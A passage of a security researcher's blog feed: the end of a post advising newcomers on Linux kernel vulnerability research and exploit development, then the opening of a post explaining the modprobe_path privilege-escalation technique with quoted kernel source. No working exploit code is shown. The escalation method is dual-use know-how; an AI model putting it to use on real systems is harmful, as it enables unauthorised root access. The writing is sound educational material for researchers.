<p>This fundamental understanding you&rsquo;ll develop by being curious is a lot more flexible and applicable to future projects than a surface level awareness of potential techniques or approaches.</p>
<h3 id="perseverance">Perseverance</h3>
<p><img src="https://sam4k.com/content/images/2022/08/frustrated.gif" alt=""></p>
<p>I&rsquo;ve touched on this a few times now: kernel VRED is both complex and open-ended. Not only is there no clear path to winning, sometime&rsquo;s there is no path at all.</p>
<p>There might not be a bug in that module you&rsquo;ve been looking at or a way to elevate your privileges with that heap overflow. Again, that&rsquo;s okay, it&rsquo;s normal!</p>
<p>Being able to persevere in the face of regular hurdles and dead-ends is key. An important aspect of this is defining &ldquo;success&rdquo; and &ldquo;failure&rdquo;. I&rsquo;ve thrown the F word around a few times so far, and been mindful to put it in quotes.</p>
<p>Just because you&rsquo;ve spent months searching for a bug in a kernel module and come up with nothing, doesn&rsquo;t mean you&rsquo;ve failed. During that time you&rsquo;ve likely deepened your understanding of the kernel, improved your workflow, come up with tooling etc.</p>
<p>All of these are things which can help you &ldquo;win&rdquo; going forward, so yes while perseverance is key when you hit these roadblocks and dead-ends, also try not to just see them as failures!</p>
<p>It&rsquo;s also worth noting, the flip side of this is knowing when to call it quits. Later in in the workflow section, I talk about having a gameplan for approaching vred tasks. Such that when you&rsquo;ve exhausted your gameplan, you know it&rsquo;s time to move on.</p>
<h3 id="ego">Ego</h3>
<p><img src="https://sam4k.com/content/images/2022/08/got_no_idea.gif" alt=""></p>
<blockquote>
<p>&ldquo;your idea or opinion of yourself, especially your feeling of your own importance and ability&rdquo; - Cambridge Dictionary on &ldquo;ego&rdquo;</p>
</blockquote>
<p>Ego plays a big role in our industry, and fortunately is something that is spoken about more these days. And no I&rsquo;m not talking about inflated egos (yet), but <a href="https://www.dictionary.com/browse/impostor-syndrome#:~:text=noun%20Psychology.,luck%20or%20other%20external%20forces.">imposter syndrome</a>.</p>
<p>In the beginning, you may come into this field finding things extremely daunting and overwhelming. After all, the kernel is huge and complicated and there&rsquo;s so many super smart people out there publishing some amazing work!</p>
<p>For many of us, this feeling never goes away. Myself included! I recently did my first conference talk at HITB2022SIN, and I was anxious for weeks in the build up despite the topic being something I worked on for months and was super familiar with.</p>
<p>Part of this was to do with public speaking, but part was worrying about the quality and validity of my work in the eyes of peers. What if it was all horribly wrong?!</p>
<p>So this section is just to reassure that if you feel this, it&rsquo;s okay, you&rsquo;re not alone! While this is common, try not to let it get on top of you! My main advice here would be that the only person you should be comparing yourself with is yourself a year or so ago[1] :)</p>
<p>The flip side to this, of course, is that I think it&rsquo;s good to maintain a level of humility. This is a field that is constantly evolving and you&rsquo;ll never know it all. Furthermore, due to the complexity of some this stuff, you might not have a complete understanding. This is all okay, just be open, and happy even, to adjust that understanding.</p>
<hr>
<ol>
<li>Totally arbitrary number of course, as you may have taken a break and been working in other areas, but you get the gist of what I mean</li>
</ol>
<h2 id="approaches">Approaches</h2>
<p><img src="https://sam4k.com/content/images/2022/08/sausage_hands.gif" alt=""></p>
<p>Alright, let&rsquo;s move onto some hands on advice! Hopefully now I&rsquo;ve instilled some of mindset involved in getting into kernel vred stuff, time to put it to good use!</p>
<p>As has been a running theme here, there&rsquo;s many different approaches to get stuck into this and we all approach learning in different ways. I&rsquo;ve tried to provide a variety of options here, though this is far from an exhaustive list.</p>
<p>Feel free to experiment, mix-and-match and see what works best for you! To throw in my 10 cents: I have found hands-on projects by far the best method to develop a working understanding of new stuff, supplementing this with some reading.</p>
<h3 id="reading">Reading</h3>
<p>Okay, so the bread-and-butter for learning about kernel vred stuff is going to be reading; there&rsquo;s a wealth of blog posts and publications out there on a range of topics.</p>
<p><img src="https://sam4k.com/content/images/2022/09/head_tv.gif" alt=""></p>
<p>Not sure what else to say about this, other than that the hardest part here is curating and finding these readings. Contributors can vary from hobbyists, professional research and academic research - all being hosted in different places by different people.</p>
<p>Beyond the customary &ldquo;use Twitter&rdquo; for your infosec needs, I&rsquo;ve also included a link in the resources below to a great repo called <a href="https://github.com/xairy/linux-kernel-exploitation">Linux Kernel Exploitation</a> maintained by <a href="https://twitter.com/andreyknvl">@andreyknvl</a> which contains a pretty thorough list of reading materials.</p>
<p>Coming into this, the amount of materials out there may be overwhelming. I&rsquo;d just suggest starting with stuff immediately relevant to what you&rsquo;re working on/interested in. E.g. if you want to try write a local priv esc, then read some recent LPE write-ups.</p>
<p>Also remember <strong>curiosity</strong> and <strong>perseverance</strong>. Some/most/all of this stuff may be utter gibberish at first, and that&rsquo;s fine. Especially with VRED write-ups, each bug and exploit will have it&rsquo;s own specific nuances which will be foreign to even experienced folks reading them for the first time.</p>
<p>Just remember to take your time to pause and follow up each bit you don&rsquo;t understand, even if it leads you down another rabbit hole, until you can piece it together.</p>
<p>Also another disclaimer that not everyone who takes the time to share their work is a NYT best seller, graphics designer or native English speaker!</p>
<h3 id="videos">Videos</h3>
<p>If you&rsquo;re more of a visual learner, the options are a bit more limited but not non-existent. Besides my GIFs and occasional diagrams, there is a reasonable amount of recorded conference talks available on YouTube.</p>
<p><img src="https://sam4k.com/content/images/2022/09/tv_popcorn.gif" alt=""></p>
<p>Again, the problem here becomes trying to find which conferences to checkout for content, because some of these may not index well and may not have a tonne of views. In the <strong>Resources</strong> section below, I&rsquo;ll include a list of con channels to get you started.</p>
<p>I&rsquo;m sure there&rsquo;s probably some great content creators out there pumping out videos, but as that&rsquo;s not my preferred media I&rsquo;m afraid I can&rsquo;t help much there. If you know of any I can plug here who make vids on Linternals / VRED then @ me pls.</p>
<h3 id="projects">Projects</h3>
<p>I feel like theory can only get you so far and if you&rsquo;re interested in doing some kernel vred, you&rsquo;re going to need to get your hands dirty at some point anyway!</p>
<p>By getting some hands on, you&rsquo;re able to put into practice the techniques and understanding you&rsquo;ve gained from your research. Furthermore, sometimes the best way to understand something in the kernel is to get in the debugger and take a peak yourself.</p>
<p>However, it&rsquo;s one thing to be told &ldquo;just get some hands on experience!&rdquo; and another to actually know where to start, especially if you&rsquo;re completely new to this.</p>
<p><img src="https://sam4k.com/content/images/2022/09/not_sure_where_to_start.gif" alt=""></p>
<p>As a result, I&rsquo;ll include some ideas and starting points for potential projects here. You&rsquo;ll find the more you get into things, the more ideas you&rsquo;ll have for your own tooling or experiments as you go on:</p>
<ol>
<li>A core part of kernel vred is, of course, understanding the kernel, so one project idea could be try and write your own kernel driver and play around with some features (reading input for userspace via IOCTLs, allocating memory etc.)</li>
<li>Follow along with exploit write-ups! Find a local privilege escalation write-up you like (maybe with source available) and try follow it along and get it running in a VM; again taking the time to understand the how&rsquo;s and why&rsquo;s of what&rsquo;s going on</li>
<li>Taking this a step further, you could try the above without source or even without a write-up by looking at some CVE&rsquo;s. Alternatively, piggy-backing off of idea 1 you could write your own vulnerable driver and exploit that :)</li>
<li>CTFs are of course another popular way to test your kernel vred mettle, and I&rsquo;ll provide some links in the resources to some below.</li>
<li>Tooling! Writing tooling to improve your kernel vred workflow or even just to explore kernel internals can be great way to develop that fundamental understanding. Don&rsquo;t worry if you don&rsquo;t have ideas right now, trust me you will!</li>
<li>Posting your own write-ups or analysis! When I started this blog, I actually never intended for anyone to see it, it was just a way to motivate myself to look into various topics and refine my understanding on them via writing accessible posts</li>
</ol>
<h2 id="workflow">Workflow</h2>
<p>Now onto the less glamorous, but just as fundamental part: workflow. I appreciate this is highly preference based, so this is more for reference and because I also find it interesting to hear about other people&rsquo;s workflows.</p>
<p><img src="https://sam4k.com/content/images/2022/09/behold_my_stuff.gif" alt=""></p>
<p>Your workflow is something that will likely constantly evolve, refined over an iterative process of discovering new tools and deeper understanding of your own preferences, strengths and weaknesses. Don&rsquo;t be afraid to try new things! :)</p>
<h3 id="tooling">Tooling</h3>
<p>For my <strong>IDE</strong>, I use &ldquo;a configuration framework for <a href="https://www.gnu.org/software/emacs/">GNU Emacs</a>&rdquo; called <a href="https://github.com/doomemacs/doomemacs">Doom</a>. It&rsquo;s very easy to setup (and tweak) and the default settings are pretty good. I actually found this project thanks to a great talk, &ldquo;<a href="https://www.youtube.com/watch?v=heib48KG-YQ&amp;ab_channel=linux.conf.au">Kernel Hacking Like It&rsquo;s 2020</a>&rdquo; by Russell Currey.</p>
<p>If you&rsquo;re interested in finding out more about Doom Emacs, there&rsquo;s <a href="https://www.youtube.com/playlist?list=PLhXZp00uXBk4np17N39WvB80zgxlZfVwj">a cool playlist</a> on YouTube to get you started by <a href="https://www.youtube.com/c/ZaisteProgramming">Zaiste Programming</a>.</p>
<p>Another cornerstone of my workflow is <strong>virtualisation</strong>. Whenever I&rsquo;m writing up a new exploit or doing some testing, I&rsquo;ll be spinning up a representative target VM[1]. My tool of choice here is <a href="https://www.qemu.org">QEMU</a>; I find it to be lightweight and very flexible (and it&rsquo;s free and open-source!).  </p>
<p>The last part of the tooling trifecta for me: the <strong>debugger</strong>. Perhaps unsurprisingly I&rsquo;m regularly neck-deep in <a href="https://www.google.com/search?q=gdb&amp;sourceid=chrome&amp;ie=UTF-8">gdb</a>[2]. Despite being quite literally older than me, it still holds up. That said, addons like <a href="https://github.com/hugsy">hugys</a>&rsquo;s <a href="https://github.com/hugsy/gef">GEF</a> (GDB Enhanced Features) makes life easier.</p>
<h3 id="organisation">Organisation</h3>
<p><img src="https://sam4k.com/content/images/2022/09/deaf.gif" alt=""></p>
<p>AKA Documentation. Yep, I said it. But no, I&rsquo;m not talking about carefully curated and margin-tweaked executive reports or several hundred page long technical specifications.</p>
<p>I can&rsquo;t stress enough how much future you will thank yourself if you get into the habit of documenting your work early on. It doesn&rsquo;t have to be anything fancy, I just use markdown + git. Just make sure there&rsquo;s some semblance of order and that it&rsquo;s going to be easy for you to hunt down and refer back to later.</p>
<p>You will accumulate <em><strong>a lot</strong></em> of knowledge during your research and you won&rsquo;t be able to retain all of it, nor will all of it be immediately useful. But having it neatly documented and easy to reference means that when you have to go back to it, you can. It also just helps to reinforce knowledge and understanding too.</p>
<p>Whether it&rsquo;s coming back to a kernel module you&rsquo;ve previously done work on and want a refresher, or if you found a heap shaping primitive in a previous CTF that would be a perfect fit for the one you&rsquo;re working on now - having notes to refer back to is a life saver.</p>
<h3 id="staying-up-to-date">Staying Up-To-Date</h3>
<p>Another useful part of your workflow to consider is keeping up-to-date with the latest kernel gossip. It seems like every week there&rsquo;s a new write-up or poc dropping and it can be a lot to keep up with, especially when they&rsquo;re from all over the place.</p>
<p><img src="https://sam4k.com/content/images/2022/09/gossip.gif" alt=""></p>
<p>When I first asked a colleague how they found all these papers and write-ups, they replied Twitter and I scoffed. Surely not? But lo and behold, several years later I can confirm Twitter is still probably the best means to find this kind of content. It is what it is.</p>
<p>Alternatively of course, you can try to curate your own feed (e.g. via RSS or Atom) from the sources themselves and use a reader to catch updates.</p>
<p>Another sources beyond blogs and news sites is of course mailing lists. Yep, they&rsquo;re still a thing. The one I mainly keep an eye on is <a href="https://www.openwall.com/lists/oss-security/2022/08/">oss-security</a> which is where you&rsquo;ll find public disclosures for linux kernel stuff if they went through the CVD process.</p>
<p>Furthermore, if you want to get granular and you&rsquo;re looking for specific information don&rsquo;t be afraid to dive into commit history or the lkml.</p>
<h3 id="having-a-gameplan">Having a Gameplan</h3>
<p>We&rsquo;re almost there, I promise! The last, but certainly not the least, aspect of the workflow I want to talk about is having a gameplan for approaching vred projects.</p>
<p>Whether it&rsquo;s vulnerability research or exploit development, we&rsquo;re dealing with inherently complex and open-ended problems, which may have no solution at all.</p>
<p>By approaching these problems with a structured methodology, we&rsquo;re able to breakdown what can seem a daunting and overwhelming task into manageable chunks. Also, if we get to the end of it and don&rsquo;t find that bug or pop that shell, we at least know we&rsquo;ve tried our best and can take what we&rsquo;ve learned and move onto the next task.</p>
<p><img src="https://sam4k.com/content/images/2022/09/gameplan.gif" alt=""></p>
<p>So instead of just diving into the problem and following each lead, I&rsquo;d recommended figuring out a gameplan that works for you and trying to approach these problems in and ordered, methodical way.</p>
<p>Again, this is something that will vary from person to person, depending on how you work. It will also likely evolve over time as you do more of this kind of work, and that&rsquo;s okay :)</p>
<p>For more concrete examples, I talk about this in my talk &ldquo;E’rybody Gettin’ TIPC: Demystifying Remote Linux Kernel Exploitation&rdquo;. The recording isn&rsquo;t up yet, but you can see the slides <a href="https://conference.hitb.org/hitbsecconf2022sin/materials/D1T1%20-%20Erybody%20Gettin%20TIPC%20-%20Demystifying%20Remote%20Linux%20Kernel%20Exploitation%20-%20Sam%20Page.pdf">here</a>.</p>
<hr>
<ol>
<li><a href="https://sam4k.com/setting-up-a-virtualised-linux-empire-on-apple-silicon/">Setting Up A Virtualised (Linux) Empire on Apple Silicon</a></li>
<li><a href="https://sam4k.com/patching-instrumenting-debugging-linux-kernel-modules/">Patching, Instrumenting &amp; Debugging Linux Kernel Modules</a></li>
</ol>
<h2 id="resources">Resources</h2>
<p>I&rsquo;m already 3000 words deep so this resources section will be a work in process and is far from exhaustive. If you have additions, feel free to @ me or DM me and I&rsquo;ll get them in.</p>
<h3 id="ctfs">CTFs</h3>
<ul>
<li><a href="https://ctf.hackthebox.com">HTB</a> has some kernel pwn challenges to practice your skills with</li>
<li><a href="https://github.com/smallkirby">smallkirby</a>/<a href="https://github.com/smallkirby/kernelpwn">kernelpwn</a> seems like a decent curation of some kernel pwn challenges, with a section for beginners too :)</li>
</ul>
<h3 id="reading-materials">Reading Materials</h3>
<ul>
<li>No need to reinvent the wheel, absolutely check out the awesome repo <a href="https://github.com/xairy/linux-kernel-exploitation">Linux Kernel Exploitation</a>, maintained by <a href="https://twitter.com/andreyknvl">@andreyknvl</a>, containing a wealth of papers and write-ups</li>
<li><a href="https://0xax.gitbooks.io/linux-insides/content/">linux-insides</a> by <a href="https://twitter.com/0xAX">0xAX</a> is a great low-level dive into some linux internals and was an inspiration for my own <a href="https://sam4k.com/linternals-introduction/">linternals</a> series :)</li>
<li><a href="https://lwn.net">LWN.net</a></li>
<li><a href="https://github.com/sam4k">sam4k</a>/<a href="https://github.com/sam4k/linux-kernel-resources">linux-kernel-resources</a> is my attempt to curate some useful kernel tidbits related to compiling, debugging, instrumenting and patching the linux kernel</li>
</ul>
<h3 id="tools">Tools</h3>
<ul>
<li><a href="https://elixir.bootlin.com/linux/latest/source">bootlin&rsquo;s elixr cross referencer for linux source</a>; great for browsing different kernel versions with references &amp; defs in the browser</li>
<li><a href="https://github.com/doomemacs/doomemacs">Doom Emacs</a>, my current IDE setup</li>
<li><a href="https://github.com/hugsy">hugsy</a>/<a href="https://github.com/hugsy/gef">gef</a> (GDB Enhanced Features), an addon for GDB to improve RE/xdev workflow</li>
</ul>
<h3 id="video-materials">Video Materials</h3>
<ul>
<li><a href="https://www.youtube.com/c/BlackHatOfficialYT">Black Hat</a> (YouTube)</li>
<li><a href="https://www.youtube.com/user/DEFCONConference">DEFCONConference</a> (Youtube)</li>
<li><a href="https://www.youtube.com/user/hitbsecconf">Hack In The Box Security Conference</a> (YouTube)</li>
<li><a href="https://www.youtube.com/c/OffensiveCon">OffensiveCon</a> (YouTube)</li>
</ul>
<h2 id="wrapping-up">Wrapping Up</h2>
<p><img src="https://sam4k.com/content/images/2022/09/itsdone.gif" alt=""></p>
<p>Oof, that was a long one, huh? Unlike my other posts, this one has covered a particularly subjective topic. Typically the content of my posts is derived from some objective source like the Linux kernel, however this one has ultimately been the culmination of my own experiences, understanding and journey into linux vred.</p>
<p>That said, I hope that at least some of the insights I&rsquo;ve shared today have been useful for you. Not everything I&rsquo;ve talked about will apply to everyone, but fingers crossed there&rsquo;s some helpful nuggets of information in there for each of you.</p>
<p>As always, I love to talk about this stuff and it means a lot to be able to help inspire and motivate people on their linux-y vred-y journeys. If you have any questions, suggestions or corrections then feel free to <a href="https://twitter.com/sam4k1">@ me or DM me on Twitter</a> :)</p>
<h3 id="change-history">Change History</h3>
<p><em>I have a feeling this will see some updates and additions, so stay tuned here for any updates to the post.</em></p>
<p>exit(0);</p>
]]></content:encoded></item><item><title>Kernel Exploitation Techniques: modprobe_path</title><description>Let&amp;#39;s kick things off with a modern day staple for local privilege escalation (LPE) in Linux Kernel Exploitation, modprobe_path.</description><link>https://sam4k.com/like-techniques-modprobe_path/</link><guid isPermaLink="false">6266f59c1b5b6d052837bff4</guid><category>linux</category><category>kernel</category><category>xdev</category><dc:creator>sam4k</dc:creator><pubDate>Mon, 04 Jul 2022 14:54:17 +0000</pubDate><media:content url="https://sam4k.com/content/images/2022/04/tired_computer-1.gif" medium="image"/><content:encoded><![CDATA[<p>I thought we&rsquo;d kick things off with a modern day staple for local privilege escalation (LPE) in <strong>Li</strong>nux <strong>K</strong>ernel <strong>E</strong>xploitation, <code>modprobe_path</code>.</p>
<p>The aim of this series on exploitation techniques is to provide byte-sized (lol, sorry) analyses on specific techniques and primitives used in kernel exploitation.</p>
<p>Focusing on explaining why and when these techniques are used, how they work and finally touching on existing, upcoming or speculative mitigations.</p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#overview">Overview</a></li>
<li><a href="#diving-in">Diving In</a>
<ul>
<li><a href="#the-code">The Code</a></li>
<li><a href="#a-pseudo-case-study">A Pseudo Case-Study</a>
<ul>
<li><a href="#actual-examples">Actual Examples</a>
<ul>
<li>CVE-2022-27666 by <a href="https://twitter.com/ETenal7">@Etenal7</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#mitigations">Mitigations</a>
<ul>
<li><a href="#so-were-all-good">So We&rsquo;re All Good?</a></li>
<li><a href="#alternatives">Alternatives</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#conclusion">Conclusion</a></li>
</ul>
<h2 id="overview">Overview</h2>
<p><code>[modprobe](https://linux.die.net/man/8/modprobe)</code> is a userspace program for adding and removing modules from the Linux kernel. When the kernel needs a feature that currently isn&rsquo;t loaded into the kernel, it can use <code>modprobe</code> to load in the appropriate module.</p>
<p>One example of this is when a userspace process <code>[](https://man7.org/linux/man-pages/man2/execve.2.html)[execve()](https://linux.die.net/man/3/execve)</code>&rsquo;s a binary:</p>
<ol>
<li>the kernel will look for the appropriate binary loader</li>
<li>if the binary&rsquo;s header isn&rsquo;t recognised, it will attempt to load the appropriate module, specifically <code>binfmt-AABBCCDD</code>, where <code>AABBCCDD</code> represent the first 4 bytes of the binary in hex</li>
<li>the kernel will attempt to load the module via <code>modprobe</code>, running it as root via the absolute path stored in the titular exported kernel symbol <code>modprobe_path</code></li>
</ol>
<p>With an arbitrary address write (AAW) primitive, and address of the <code>modprobe_path</code> symbol, an attacker can overwrite <code>modprobe_path</code> to malicious binary X.</p>
<p>Then, by creating and executing a binary with a unknown header[1], an unprivileged attacker can cause the kernel to go through steps 1-3 above.</p>
<p>Except this time, it runs the the overwritten <code>modprobe_path</code> as root, letting the attacker run malicious binary X as root, allowing for LPE.</p>
<hr>
<ol>
<li>Specifically, as we&rsquo;ll explain later, it needs to be 4 non-<code>[printable()](https://elixir.bootlin.com/linux/v5.18.3/source/fs/exec.c#L1698)</code> bytes that aren&rsquo;t already supported header formats</li>
</ol>
<h2 id="diving-in">Diving In</h2>
<p><img src="https://sam4k.com/content/images/2022/07/going_on_an_adventure.gif" alt=""></p>
<p>Now that we&rsquo;ve got a high level overview of what we&rsquo;re dealing with, let&rsquo;s dive into some technical details as we explore the code path to executing <code>modprobe_path</code>, usecases for this techniques and how it can be leveraged by attackers. Finally we&rsquo;ll cover mitigations.</p>
<h3 id="the-code">The Code</h3>
<p>When we call the <code>execve()</code> family in userspace, directly or indirectly (such as running a program in your shell), it ultimately makes its way to the kernel via the <code>[execve](https://man7.org/linux/man-pages/man2/execve.2.html)</code> syscall:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="n">SYSCALL_DEFINE3</span><span class="p">(</span><span class="n">execve</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="k">const</span> <span class="n">char</span> <span class="n">__user</span> <span class="o">*</span><span class="p">,</span> <span class="n">filename</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="k">const</span> <span class="n">char</span> <span class="n">__user</span> <span class="o">*</span><span class="k">const</span> <span class="n">__user</span> <span class="o">*</span><span class="p">,</span> <span class="n">argv</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="k">const</span> <span class="n">char</span> <span class="n">__user</span> <span class="o">*</span><span class="k">const</span> <span class="n">__user</span> <span class="o">*</span><span class="p">,</span> <span class="n">envp</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">return</span> <span class="n">do_execve</span><span class="p">(</span><span class="n">getname</span><span class="p">(</span><span class="n">filename</span><span class="p">),</span> <span class="n">argv</span><span class="p">,</span> <span class="n">envp</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v5.18.5/source/fs/exec.c">fs/exec.c</a> (v5.18.5)</p>
<p>We&rsquo;ll not get too bogged down in how programs actually get run in Linux, there plenty of great content out there on the topic[1].</p>
<p>What we&rsquo;re interested in is the fact that in order to the execute the program specified by <code>filename</code>, the kernel needs to understand what it&rsquo;s trying to execute.</p>
<p>As mentioned earlier, part of this process involves <code>[search_binary_handler(struct linux_binprm *bprm)](https://elixir.bootlin.com/linux/v5.18.5/source/fs/exec.c#L1702)</code>, where <code>[struct linux_bprm](https://elixir.bootlin.com/linux/v5.18.5/source/include/linux/binfmts.h#L18)</code> is the binary parameter struct which is used by is used by the kernel to &ldquo;hold the arguments that are used when loading binaries&rdquo;[2].</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">[#0] search_binary_handler(...)
</span></span><span class="line"><span class="cl">[#1] exec_binprm(...)
</span></span><span class="line"><span class="cl">[#2] bprm_execve(...)
</span></span><span class="line"><span class="cl">[#3] do_execveat_common(...)
</span></span><span class="line"><span class="cl">[#4] do_execve(...)
</span></span><span class="line"><span class="cl">[#5] SYSCALL_DEFINE3(execve,...) 
</span></span><span class="line"><span class="cl">[#6] userspace makes execve() syscall
</span></span></code></pre></div><p>Pseudo-backtrace up to <code>search_binary_handler()</code></p>
<p>As per the source comments, this function &ldquo;<em>cycle[s] the list of binary formats handler, until one recognizes the image&rdquo;.</em> These binary format handlers are represented by <code>[struct linux_binfmt](https://elixir.bootlin.com/linux/v5.18.5/source/include/linux/binfmts.h#L85)</code> and are stored in the doubly linked list, <code>[formats](https://elixir.bootlin.com/linux/v5.18.5/source/fs/exec.c#L82)</code>.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="k">static</span> <span class="ne">int</span> <span class="n">search_binary_handler</span><span class="p">(</span><span class="n">struct</span> <span class="n">linux_binprm</span> <span class="o">*</span><span class="n">bprm</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="ne">bool</span> <span class="n">need_retry</span> <span class="o">=</span> <span class="n">IS_ENABLED</span><span class="p">(</span><span class="n">CONFIG_MODULES</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="n">struct</span> <span class="n">linux_binfmt</span> <span class="o">*</span><span class="n">fmt</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="ne">int</span> <span class="n">retval</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    
</span></span><span class="line"><span class="cl">	<span class="o">...</span>
</span></span><span class="line"><span class="cl"> <span class="n">retry</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">	<span class="n">read_lock</span><span class="p">(</span><span class="o">&amp;</span><span class="n">binfmt_lock</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="n">list_for_each_entry</span><span class="p">(</span><span class="n">fmt</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">formats</span><span class="p">,</span> <span class="n">lh</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">try_module_get</span><span class="p">(</span><span class="n">fmt</span><span class="o">-&gt;</span><span class="n">module</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">			<span class="k">continue</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="n">read_unlock</span><span class="p">(</span><span class="o">&amp;</span><span class="n">binfmt_lock</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">		<span class="n">retval</span> <span class="o">=</span> <span class="n">fmt</span><span class="o">-&gt;</span><span class="n">load_binary</span><span class="p">(</span><span class="n">bprm</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">		<span class="n">read_lock</span><span class="p">(</span><span class="o">&amp;</span><span class="n">binfmt_lock</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="n">put_binfmt</span><span class="p">(</span><span class="n">fmt</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="n">bprm</span><span class="o">-&gt;</span><span class="n">point_of_no_return</span> <span class="o">||</span> <span class="p">(</span><span class="n">retval</span> <span class="o">!=</span> <span class="o">-</span><span class="n">ENOEXEC</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">			<span class="n">read_unlock</span><span class="p">(</span><span class="o">&amp;</span><span class="n">binfmt_lock</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">			<span class="k">return</span> <span class="n">retval</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="p">}</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">	<span class="n">read_unlock</span><span class="p">(</span><span class="o">&amp;</span><span class="n">binfmt_lock</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">need_retry</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="n">printable</span><span class="p">(</span><span class="n">bprm</span><span class="o">-&gt;</span><span class="n">buf</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="o">&amp;&amp;</span> <span class="n">printable</span><span class="p">(</span><span class="n">bprm</span><span class="o">-&gt;</span><span class="n">buf</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span> <span class="o">&amp;&amp;</span>
</span></span><span class="line"><span class="cl">		    <span class="n">printable</span><span class="p">(</span><span class="n">bprm</span><span class="o">-&gt;</span><span class="n">buf</span><span class="p">[</span><span class="mi">2</span><span class="p">])</span> <span class="o">&amp;&amp;</span> <span class="n">printable</span><span class="p">(</span><span class="n">bprm</span><span class="o">-&gt;</span><span class="n">buf</span><span class="p">[</span><span class="mi">3</span><span class="p">]))</span>
</span></span><span class="line"><span class="cl">			<span class="k">return</span> <span class="n">retval</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="n">request_module</span><span class="p">(</span><span class="s2">&#34;binfmt-</span><span class="si">%04x</span><span class="s2">&#34;</span><span class="p">,</span> <span class="o">*</span><span class="p">(</span><span class="n">ushort</span> <span class="o">*</span><span class="p">)(</span><span class="n">bprm</span><span class="o">-&gt;</span><span class="n">buf</span> <span class="o">+</span> <span class="mi">2</span><span class="p">))</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">			<span class="k">return</span> <span class="n">retval</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="n">need_retry</span> <span class="o">=</span> <span class="bp">false</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="n">goto</span> <span class="n">retry</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">return</span> <span class="n">retval</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v5.18.5/source/fs/exec.c#L1702">fs/exec.c</a> (v5.18.5)</p>
<p>Looking at the code above, we can see that <code>search_binary_handler()</code> iterates over each binary format in <code>formats</code> [line 10]. As we iterate over each format, we see if that format&rsquo;s <code>load_binary()</code>[3] implementation can process our <code>bprm</code> (which contains a buffer, <code>data</code>, of up to the first <code>[BINPRM_BUF_SIZE](https://elixir.bootlin.com/linux/v5.18.5/source/include/uapi/linux/binfmts.h#L19)</code> bytes of data from our executable) [line 15].</p>
<p>If we managed to load the binary, we can return successfully [line 21], otherwise if we&rsquo;ve tried all the formats in <code>format</code> and <code>CONFIG_MODULES</code> [4] is is set, we hit the block starting line 27.</p>
<p>Then comes the check [line 27] we mentioned earlier: if each of the first 4 bytes of our executable are all <code>printable()</code>, we return here.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="cp">#define printable(c) (((c)==&#39;\t&#39;) || ((c)==&#39;\n&#39;) || (0x20&lt;=(c) &amp;&amp; (c)&lt;=0x7e))
</span></span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v5.18.5/source/fs/exec.c#L1698">fs/exec.c</a> (v5.18.5)</p>
<p><code>printable()</code> is a simple macro that yields true if char <code>c</code> is an ASCII printable character (a tab, newline, space or other ASCII characters you see on your keyboard).</p>
<p>So, if the first four bytes of the binary contains one or more non-<code>printable()</code> bytes[5] then comes the interesting part [line 30]: the kernel will attempt to find the appropriate binary format handler by trying to load a module of the expected name &ldquo;binfmt-WXYZ&rdquo;, where WXYZ are the hex representation of the first four bytes of our executable.</p>
